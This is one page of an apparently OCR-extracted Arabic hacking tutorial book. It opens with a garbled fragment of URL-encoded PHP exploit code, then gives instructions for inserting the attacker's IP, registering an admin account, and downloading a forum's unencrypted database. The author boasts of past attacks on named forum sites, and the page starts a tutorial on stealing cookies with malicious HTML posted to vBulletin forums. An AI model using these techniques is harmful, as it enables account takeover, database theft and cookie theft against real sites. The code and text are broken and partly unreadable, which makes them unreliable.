Page 314 - بسم الله الرحمن الرحيم
P. 314

‫‪%24arr);%24str=exec(fgets(%24fp,substr("128",0,3)),‬‬
‫)‪%24arr);for(%24ir=substr("0",0,1);%24ir< sizeof(%24arr);%24ir%2B%2B‬‬

                                                                   ‫‪{fputs(%24fp,%24arr[%24‬‬

                              ‫‪_ir]);fputs(%24fp,%24va);}}fclose(%24fp);}die(vhak‬‬

                                                           ‫‪"finished_execution);echo%28‬‬

                                                                                          ‫‪By Kill -9‬‬

‫لحظ ‪ IP.IP.IP.IP‬هذه تصحط مكانها رقم الي بي حقك ‪ ،‬ثم الحظ بعدها وجهود الرقم ‪ 12‬وهذا تصغيرها على‬
                                                    ‫طول رقم الي بي ‪ ،‬مثل ‪ 127.0.0.1‬يكون طوله ‪9‬‬

‫ممكن أنت تصخترع كود ثاني وتصرسله وتصلحظ أنه يتنفذ ‪ ،‬ممكن تصرسل كود يسجل لك أدمين ‪ ،‬هذا مثل ما صار‬
    ‫في ‪) arabteam2000.com‬أصدقائي طبعا( من باب التنبيه ‪ ،‬وكمان صار في ‪ c4arab.com‬و‬
   ‫طريق السل‪.‬م و الثقافه ‪...‬وكثير من المنتديات ‪ ،‬بهدف التحذير وليس التخريب ‪ ،‬وواضح أنه عمل بسيط‬
         ‫يحتاج لشويه من التفكير ‪ ،‬أعتقد أهليز زمان صار فيه ‪ ،‬ولكن مسحت الداتصالبيس وهذا سهل للغايه‬

                                                  ‫طريقه قديمه نوعا ما ‪ ،‬وحطيتها للي حب يجرب فقط !!‬

                                                                          ‫وأعذروني على الملء والنحو‬

                             ‫ملحظه أختيره ‪ :‬وهي عند ما تصشبك مع السيرفر عن طريق البورت ‪ 90‬أرسل‬
                                                                                    ‫‪d downloads-‬‬

    ‫تصنزل لك الداتصبيس كلها ‪ ،‬وللسف طلعت غير مشفره وهذا يدل على التخلف ‪ ،‬ولكن في الصداره ‪2.2x‬‬
                                                               ‫شفرت ولكن كسرتصها وقريبا أقول لك عنها‬

                                                              ‫تصم شر ح طريقة الختتراق من ‪ 113‬الي ‪11‬‬

                                                                      ‫طريقة اختتراق من ‪ 115‬الي ‪225‬‬

      ‫المتطلبات ‪) WebServer :‬تصركيب سيرفر على جههازك الشخصي( ‪ +‬متصفح انترنت )اكسبلورر( ‪.‬‬
                                                                                     ‫المستوى ‪ :‬متوسط‬

    ‫ملحظة ‪ :‬هذه الطريقة لست للـ ‪ vBulletin‬فقط !! يمكن ان تصجربها على انواع اخترى من المنتديات ‪.‬‬

                                                                                             ‫‪----------‬‬
                                                                                                ‫الثغرة ‪:‬‬

                                                                                              ‫‪---------‬‬

  ‫تصنقسم طريقة العمل الى عدة اقسا‪.‬م ‪ ..‬أول بعض السكربتات الخبيثة التي تصسرق الكوكيز بالضافة الى جهعل‬
                                                                                        ‫المنتدى يستقبل‬

                           ‫بيانات من مكان ختاطيء ‪ ..‬لكن يشترط ان يسمح المنتدى بأكواد الـ ‪.. HTML‬‬

 ‫قم بكتابة موضوع جهديد او رد )في منتدى يدعم الـ ‪ .. ( HTML‬ثم اكتب اي موضوع والصق بين السطور‬

                                                ‫‪314‬‬
   309   310   311   312   313   314   315   316   317   318   319